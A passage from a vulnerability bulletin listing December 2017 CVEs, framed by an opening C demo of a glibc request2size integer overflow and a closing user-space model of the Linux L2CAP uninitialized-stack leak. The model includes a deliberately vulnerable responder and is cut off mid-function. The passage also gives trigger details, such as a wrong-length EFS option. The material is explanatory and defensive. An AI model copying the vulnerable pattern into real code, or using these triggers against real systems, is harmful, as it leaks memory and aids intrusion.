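static size_t first_wrapping_request(void)
{
    return (size_t)0 - (SIZE_SZ + MALLOC_ALIGN_MASK);
}

int main(void)
{
    size_t huge = SIZE_MAX - 4, out;
    printf("request2size(SIZE_MAX-4) unchecked -> %zu bytes\n",
           request2size_unchecked(huge));
    printf("request2size(SIZE_MAX-4) checked   -> %s\n",
           request2size_checked(huge, &out) ? "ok" : "refused");
    return 0;
}
```

In 2.26 the tcache fast path used the unchecked value, looked up the bin for a 32-byte chunk and, if one was cached, handed it to a caller that believed it had a buffer near SIZE_MAX bytes long; the fix performs the range check before the tcache lookup. A quick regression check on a live system is that malloc(SIZE_MAX - 4) returns NULL with errno set to ENOMEM.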
gnu -- binutils
The dump_relocs_in_section function in objdump.c in GNU Binutils 2.29.1 does not check for reloc count integer overflows, which allows remote attackers to cause a denial of service (excessive memory allocation, or heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted PE file.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17122 (MISC, MISC)
gnu -- binutils
The Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, allows remote attackers to cause a denial of service (memory access violation) or possibly have unspecified other impact via a COFF binary in which a relocation refers to a location after the end of the to-be-relocated section.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17121 (MISC, MISC)
gnu -- binutils
The coff_slurp_reloc_table function in coffcode.h in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted COFF based file.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17123 (MISC, MISC)
gnu -- binutils
The _bfd_coff_read_string_table function in coffgen.c in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils 2.29.1, does not properly validate the size of the external string table, which allows remote attackers to cause a denial of service (excessive memory consumption, or heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted COFF binary.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17124 (MISC, MISC)
gnu -- binutils
The load_debug_section function in readelf.c in GNU Binutils 2.29.1 allows remote attackers to cause a denial of service (invalid memory access and application crash) or possibly have unspecified other impact via an ELF file that lacks section headers.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17126 (MISC, MISC)
gnu -- binutils
nm.c and objdump.c in GNU Binutils 2.29.1 mishandle certain global symbols, which allows remote attackers to cause a denial of service (_bfd_elf_get_symbol_version_string buffer over-read and application crash) or possibly have unspecified other impact via a crafted ELF file.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17125 (MISC, MISC)
gnu -- libextractor
GNU Libextractor 1.6 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted GIF, IT (Impulse Tracker), NSFE, S3M (Scream Tracker 3), SID, or XM (eXtended Module) file, as demonstrated by the EXTRACTOR_xm_extract_method function in plugins/xm_extractor.c.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17440 (BID, MISC, MISC, MISC, MISC, MISC, MISC, MISC)
google -- android
A denial of service vulnerability in the Android media framework (libmpeg2). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65717533.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13148 (CONFIRM)
google -- android
An information disclosure vulnerability in the Android system (activitymanagerservice). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-32879772.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13159 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the MediaTek performance service. Product: Android. Versions: Android kernel. Android ID A-64316572. References: M-ALPS03479086.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13171 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the Android system (art). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64211847.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13156 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the Android media framework (libaudioservice). Product: Android. Versions: 8.0. Android ID A-65280854.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13153 (CONFIRM)
google -- android
An information disclosure vulnerability in the Android system (activitymanagerservice). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-32990341.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13157 (BID, CONFIRM)
google -- android
An information disclosure vulnerability in the Android media framework (n/a). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65719872.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13149 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the Android media framework (libstagefright). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63666573.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13154 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel scsi driver. Product: Android. Versions: Android kernel. Android ID A-65023233.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13168 (CONFIRM)
google -- android
An information disclosure vulnerability in the Android media framework (libmedia drm). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-62872384.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13152 (CONFIRM)
google -- android
An information disclosure vulnerability in the kernel binder driver. Product: Android. Versions: Android kernel. Android ID A-36007193.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13164 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the MediaTek display driver. Product: Android. Versions: Android kernel. Android ID A-36102397. References: M-ALPS03359280.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13170 (BID, CONFIRM)
google -- android
An information disclosure vulnerability in the kernel camera server. Product: Android. Versions: Android kernel. Android ID A-37512375.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13169 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel sound timer. Product: Android. Versions: Android kernel. Android ID A-37240993.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13167 (CONFIRM)
google -- android
A remote code execution vulnerability in the Android media framework (libmpeg2). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63874456.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13151 (CONFIRM)
google -- android
An information disclosure vulnerability in the Android media framework (n/a). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-38328132.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13150 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the MediaTek system server. Product: Android. Versions: Android kernel. Android ID A-28067350. References: M-ALPS02672361.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13173 (BID, CONFIRM)
google -- android
NVIDIA mediaserver contains a vulnerability where it is possible a use after free malfunction can occur due to an incorrect bounds check which could enable unauthorized code execution and possibly lead to elevation of privileges. This issue is rated as high. Product: Android. Version: N/A. Android ID: A-63802421. References: N-CVE-2017-6276.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-6276 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel binder. Product: Android. Versions: Android kernel. Android ID A-64216036.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13162 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel edl. Product: Android. Versions: Android kernel. Android ID A-63100473.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13174 (BID, CONFIRM)
google -- android
NVIDIA driver contains a vulnerability where it is possible a use after free malfunction can occur due to improper usage of the list_for_each kernel macro which could enable unauthorized code execution and possibly lead to elevation of privileges. This issue is rated as high. Product: Android. Version: N/A. Android ID: A-38046353. References: N-CVE-2017-6263.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-6263 (BID, CONFIRM)
google -- android
NVIDIA driver contains a vulnerability where it is possible a use after free malfunction can occur due to a race condition which could enable unauthorized code execution and possibly lead to elevation of privileges. This issue is rated as high. Product: Android. Version: N/A. Android ID: A-38045794. References: N-CVE-2017-6262.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-6262 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the MediaTek bluetooth driver. Product: Android. Versions: Android kernel. Android ID A-36493287. References: M-ALPS03495791.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13172 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the Broadcom wireless driver. Product: Android. Versions: Android kernel. Android ID A-63930471. References: BC-V2017092501.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13161 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel mtp usb driver. Product: Android. Versions: Android kernel. Android ID A-37429972.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13163 (CONFIRM)
google -- android
A remote code execution vulnerability in the Android system (bluetooth). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-37160362.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13160 (BID, CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel file system. Product: Android. Versions: Android kernel. Android ID A-31269937.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13165 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the kernel v4l2 video driver. Product: Android. Versions: Android kernel. Android ID A-34624167.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13166 (CONFIRM)
google -- android
An information disclosure vulnerability in the Android system (activitymanagerservice). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-32879915.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13158 (BID, CONFIRM)
google -- android
An information disclosure vulnerability in the NVIDIA libwilhelm. Product: Android. Versions: Android kernel. Android ID A-64339309. References: N-CVE-2017-13175.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-13175 (CONFIRM)
google -- android
A denial of service vulnerability in the Android media framework (libmpeg2). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63316255.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0873 (CONFIRM)
google -- android
A denial of service vulnerability in the Android media framework (libskia). Product: Android. Versions: 7.0, 7.1.1, 7.1.2. Android ID A-65646012.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0880 (CONFIRM)
google -- android
An information disclosure vulnerability in the Android media framework (n/a). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65025028.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0879 (CONFIRM)
google -- android
A remote code execution vulnerability in the Android media framework (libavc). Product: Android. Versions: 6.0. Android ID A-64964675.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0876 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the Android media framework (libaudiopolicymanager). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-64340921.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0837 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the Android framework (libminikin). Product: Android. Versions: 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-62134807.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0870 (CONFIRM)
google -- android
A denial of service vulnerability in the Android media framework (libavc). Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-63315932.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0874 (CONFIRM)
google -- android
A remote code execution vulnerability in the Android media framework (libhevc). Product: Android. Versions: 8.0. Android ID A-65186291.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0878 (CONFIRM)
google -- android
A remote code execution vulnerability in the Android media framework (libavc). Product: Android. Versions: 6.0. Android ID A-66372937.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0877 (CONFIRM)
google -- android
An elevation of privilege vulnerability in the Android framework (framework base). Product: Android. Versions: 8.0. Android ID A-65281159.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0871 (CONFIRM)
google -- android
A remote code execution vulnerability in the Android media framework (libskia). Product: Android. Versions: 7.0, 7.1.1, 7.1.2, 8.0. Android ID A-65290323.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-0872 (CONFIRM)
heimdal -- heimdal
In Heimdal through 7.4, remote unauthenticated attackers are able to crash the KDC by sending a crafted UDP packet containing empty data fields for client name or realm. The parser would unconditionally dereference NULL pointers in that case, leading to a segmentation fault. This is related to the _kdc_as_rep function in kdc/kerberos5.c and the der_length_visible_string function in lib/asn1/der_length.c.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17439 (MISC, CONFIRM, CONFIRM, CONFIRM, DEBIAN)
hpe -- connected_backup
A potential security vulnerability has been identified in HPE Connected Backup versions 8.6 and 8.8.6. The vulnerability could be exploited locally to allow escalation of privilege.
Published: 2017-12-05 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-14355 (BUGTRAQ, BID, CONFIRM)
i2pd -- i2pd
The (1) i2pd before 2.17 and (2) kovri pre-alpha implementations of the I2P routing protocol do not properly handle Garlic DeliveryTypeTunnel packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading sensitive router memory, aka the GarlicRust bug.
Published: 2017-12-05 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17066 (MISC, MISC)
ibm -- atlas_ediscovery_process_management
IBM Atlas eDiscovery Process Management 6.0.3 stores sensitive information in URL parameters. This may lead to information disclosure if unauthorized parties have access to the URLs via server logs, referrer header or browser history. IBM X-Force ID: 126682.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1355 (BID, MISC, CONFIRM)
ibm -- atlas_ediscovery_process_management
IBM Atlas eDiscovery Process Management 6.0.3 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 126683.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1356 (BID, MISC, CONFIRM)
ibm -- atlas_ediscovery_process_management
IBM Atlas eDiscovery Process Management 6.0.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 126681.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1354 (MISC, CONFIRM)
ibm -- atlas_ediscovery_process_management
IBM Atlas eDiscovery Process Management 6.0.3 could allow an authenticated attacker to obtain sensitive information when an unsuspecting user clicks on unsafe third-party links. IBM X-Force ID: 126680.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1353 (MISC, CONFIRM)
ibm -- connections
IBM Connections 5.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 129020.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1498 (CONFIRM, BID, MISC)
ibm -- sterling_b2b_integrator_standard_edition
IBM Sterling B2B Integrator Standard Edition 5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 128620.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1482 (CONFIRM, BID, MISC)
ibm -- sterling_b2b_integrator_standard_edition
IBM Sterling B2B Integrator Standard Edition 5.2 allows a user to view sensitive information that belongs to another user. IBM X-Force ID: 128619.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1481 (CONFIRM, BID, MISC)
ibm -- sterling_file_gateway
IBM Sterling File Gateway 2.2 could allow an authenticated attacker to obtain sensitive information such as login ids on the system. IBM X-Force ID: 128626.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1487 (CONFIRM, BID, MISC)
ibm -- sterling_file_gateway
IBM Sterling File Gateway 2.2 could allow an unauthorized user to view files they should not have access to, provided they know the directory location of the file. IBM X-Force ID: 128695.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1497 (CONFIRM, MISC)
ibm -- tririga
IBM TRIRIGA 3.2, 3.3, 3.4, and 3.5 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim's click actions and possibly launch further attacks against the victim. IBM X-Force ID: 128464.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1465 (CONFIRM, MISC)
ibm -- websphere_mq
IBM WebSphere MQ 8.0 and 9.0 could allow, under special circumstances, an unauthorized user to access an object which they should have been denied access to. IBM X-Force ID: 126456.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1341 (CONFIRM, BID, MISC)
ibm -- websphere_mq
IBM WebSphere MQ 7.5, 8.0, and 9.0 could allow an authenticated user to insert messages with a corrupt RFH header into the channel which would cause it to restart. IBM X-Force ID: 127803.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1433 (CONFIRM, MISC)
ibm -- infosphere_biginsights
IBM Infosphere BigInsights 4.2.0 could allow an attacker to inject code that could allow access to restricted data and files. IBM X-Force ID: 126244.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1336 (CONFIRM, BID, MISC)
ibm -- insights_foundation_for_energy
IBM Insights Foundation for Energy 2.0 could reveal sensitive information in error messages to authenticated users that could be used to conduct further attacks. IBM X-Force ID: 126457.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1342 (CONFIRM, MISC)
ibm -- security_guardium
IBM Security Guardium 9.0, 9.1, and 9.5 supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties. IBM X-Force ID: 124746.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1271 (CONFIRM, BID, SECTRACK, MISC)
marked -- marked
A Regular expression Denial of Service (ReDoS) vulnerability in the file marked.js of the marked npm package (tested on version 0.3.7) allows a remote attacker to overload and crash a server by passing a maliciously crafted string.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17461 (MISC)
ispconfig -- ispconfig
ISPConfig 3.x before 3.1.9 allows remote authenticated users to obtain root access by creating a crafted cron job.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17384 (CONFIRM)
japan_agency_for_local_authority_information_systems -- jpki
Untrusted search path vulnerability in The Public Certification Service for Individuals "The JPKI user's software" Ver3.1 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-10893 (JVN)
jenkins -- jenkins
Jenkins through 2.93 allows remote authenticated administrators to conduct XSS attacks via a crafted tool name in a job configuration form, as demonstrated by the JDK tool in Jenkins core and the Ant tool in the Ant plugin, aka SECURITY-624.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17383 (CONFIRM)
johnson_and_johnson -- ethicon_endo-surgery_generator_gen11
An improper authentication issue was discovered in Johnson & Johnson Ethicon Endo-Surgery Generator Gen11, all versions released before November 29, 2017. The security authentication mechanism used between the Ethicon Endo-Surgery Generator Gen11 and single-patient use products can be bypassed, allowing for unauthorized devices to be connected to the generator, which could result in a loss of integrity or availability.
Published: 2017-12-05 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-14018 (BID, MISC)
k7_computing -- k7_antivirus
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x95002570 DeviceIoControl request.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17464 (MISC)
k7_computing -- k7_antivirus
K7Sentry.sys 15.1.0.59 in K7 Antivirus 15.1.0309 has a NULL pointer dereference via a 0x95002574 DeviceIoControl request.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17465 (MISC)
kaspersky -- embedded_systems_security
Kernel pool memory corruption in one of the drivers in Kaspersky Embedded Systems Security version 1.2.0.300 leads to local privilege escalation.
Published: 2017-12-08 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-12823 (CONFIRM)
libav -- libav
The h264_slice_init function in libavcodec/h264_slice.c in Libav 12.2 allows remote attackers to cause a denial of service (segmentation fault and application crash) via a crafted file.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17128 (MISC)
libav -- libav
The ff_vc1_mc_4mv_chroma4 function in libavcodec/vc1_mc.c in Libav 12.2 allows remote attackers to cause a denial of service (segmentation fault and application crash) or possibly have unspecified other impact via a crafted file.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17129 (MISC)
libav -- libav
The vc1_decode_frame function in libavcodec/vc1dec.c in Libav 12.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted file.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17127 (MISC)
libav -- libav
The ff_free_picture_tables function in libavcodec/mpegpicture.c in Libav 12.2 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file, related to vc1_decode_i_blocks_adv.
Published: 2017-12-04 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17130 (MISC)
libsndfile -- libsndfile
The function d2alaw_array() in alaw.c of libsndfile 1.0.29pre1 may lead to a remote DoS attack (SEGV on unknown address 0x000000000000), a different vulnerability than CVE-2017-14245.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17456 (MISC)
libsndfile -- libsndfile
The function d2ulaw_array() in ulaw.c of libsndfile 1.0.29pre1 may lead to a remote DoS attack (SEGV on unknown address 0x000000000000), a different vulnerability than CVE-2017-14246.
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17457 (MISC)
libtiff -- libtiff
tools/pal2rgb.c in pal2rgb in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (TIFFSetupStrips heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted TIFF file.
Published: 2017-12-02 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17095 (MISC, MISC)
libxcursor -- libxcursor
libXcursor before 1.1.15 has various integer overflows that could lead to heap buffer overflows when processing malicious cursors, e.g., with programs like GIMP.
Published: 2017-12-01 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-16612 (CONFIRM, MLIST, UBUNTU, CONFIRM, CONFIRM, MLIST, DEBIAN)
libxfont_libxfont2 -- libxfont_libxfont2
In libXfont before 1.5.4 and libXfont2 before 2.0.3, a local attacker can open (but not read) files on the system as root, triggering tape rewinds, watchdogs, or similar mechanisms that can be triggered by opening files.
Published: 2017-12-01 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-16611 (MISC, MLIST, UBUNTU, CONFIRM, MLIST, MLIST)
linux -- linux_kernel
The bnep_add_connection function in net/bluetooth/bnep/core.c in the Linux kernel before 3.19 does not ensure that an l2cap socket is available, which allows local users to gain privileges via a crafted application.
Published: 2017-12-05 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-15868 (CONFIRM, BID, CONFIRM, CONFIRM, CONFIRM)
linux -- linux_kernel
The dccp_disconnect function in net/dccp/proto.c in the Linux kernel through 4.14.3 allows local users to gain privileges or cause a denial of service (use-after-free) via an AF_UNSPEC connect system call during the DCCP_LISTEN state.
Published: 2017-12-05 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-8824 (MISC, MISC, BID)
linux -- linux_kernel
net/netfilter/nfnetlink_cthelper.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for new, get, and del operations, which allows local users to bypass intended access restrictions because the nfnl_cthelper_list data structure is shared across all net namespaces.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17448 (BID, MISC)
linux -- linux_kernel
The __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in the Linux kernel through 4.14.4, when CONFIG_NLMON is enabled, does not restrict observations of Netlink messages to a single net namespace, which allows local users to obtain sensitive information by leveraging the CAP_NET_ADMIN capability to sniff an nlmon interface for all Netlink activity on the system.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17449 (MISC)
linux -- linux_kernel
net/netfilter/xt_osf.c in the Linux kernel through 4.14.4 does not require the CAP_NET_ADMIN capability for add_callback and remove_callback operations, which allows local users to bypass intended access restrictions because the xt_osf_fingers data structure is shared across all net namespaces.
Published: 2017-12-06 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-17450 (BID, MISC)
linux -- linux_kernel
The Linux kernel version 3.3-rc1 and later is affected by a vulnerability that lies in the processing of incoming L2CAP commands (ConfigRequest and ConfigResponse messages). This info leak is a result of uninitialized stack variables that may be returned to an attacker in their uninitialized state. By manipulating the code flows that precede the handling of these configuration messages, an attacker can also gain some control over which data will be held in the uninitialized stack variables. This can allow him to bypass KASLR and stack canary protection, as both pointers and stack canaries may be leaked in this manner. Combining this vulnerability (for example) with the previously disclosed RCE vulnerability in L2CAP configuration parsing (CVE-2017-1000251) may allow an attacker to exploit the RCE against kernels which were built with the above mitigations.

These are the specifics of this vulnerability. In the function l2cap_parse_conf_rsp and in the function l2cap_parse_conf_req the following variable is declared without initialization:

    struct l2cap_conf_efs efs;

In addition, when parsing input configuration parameters in both of these functions, the switch case for handling EFS elements may skip the memcpy call that would write to the efs variable:

    ...
    case L2CAP_CONF_EFS:
        if (olen == sizeof(efs))
            memcpy(&efs, (void *)val, olen);
    ...

The olen in the above if is attacker controlled, and regardless of that if, in both of these functions the efs variable would eventually be added to the outgoing configuration request that is being built:

    l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS, sizeof(efs), (unsigned long) &efs);

So by sending a configuration request or response that contains an L2CAP_CONF_EFS element, but with an element length that is not sizeof(efs), the memcpy to the uninitialized efs variable can be avoided, and the uninitialized variable would be returned to the attacker (16 bytes).
Published: 2017-12-07 | CVSS Score: not yet calculated | Source & Patch Info: CVE-2017-1000410 (MLIST, BID)
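The entry above quotes the kernel's own fragments; what follows is an added user-space model (not kernel code) that reproduces the bug's shape end to end so it can be run and tested: a type/length/value option walker, a "vulnerable" responder that always echoes a never-initialized 16-byte struct, and a hardened responder beside it. The option-type value, the user-space framing and the specific hardening (zero the struct and echo the EFS option only when a well-formed one arrived) are assumptions for this illustration, not the kernel's actual patch.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define L2CAP_CONF_EFS 0x06          /* assumed option-type value for this model */

/* Same 16-byte shape as the kernel's struct l2cap_conf_efs. */
struct l2cap_conf_efs {
    uint8_t  id;
    uint8_t  stype;
    uint16_t msdu;
    uint32_t sdu_itime;
    uint32_t acc_lat;
    uint32_t flush_to;
} __attribute__((packed));

/* Walk the type/len/value options of a ConfigRequest. Copies an EFS option
 * into *efs only when its length matches sizeof(*efs). Returns 1 if an EFS
 * was copied, 0 if none was, -1 if an option runs past the end of the packet. */
static int walk_options(const uint8_t *in, size_t inlen, struct l2cap_conf_efs *efs)
{
    size_t pos = 0;
    int seen = 0;
    while (pos + 2 <= inlen) {
        uint8_t type = in[pos], olen = in[pos + 1];     /* olen is attacker controlled */
        const uint8_t *val = in + pos + 2;
        if (pos + 2 + olen > inlen) return -1;          /* truncated option */
        if (type == L2CAP_CONF_EFS && olen == sizeof *efs) {
            memcpy(efs, val, olen);                     /* skipped when olen != 16 */
            seen = 1;
        }
        pos += 2 + olen;
    }
    return seen;
}

/* Vulnerable shape: efs is never initialized, and the response always carries
 * it, so an EFS option with the wrong length turns 16 bytes of stack into output. */
int build_rsp_vulnerable(const uint8_t *in, size_t inlen, uint8_t *out, size_t outcap)
{
    struct l2cap_conf_efs efs;                          /* deliberately uninitialized */
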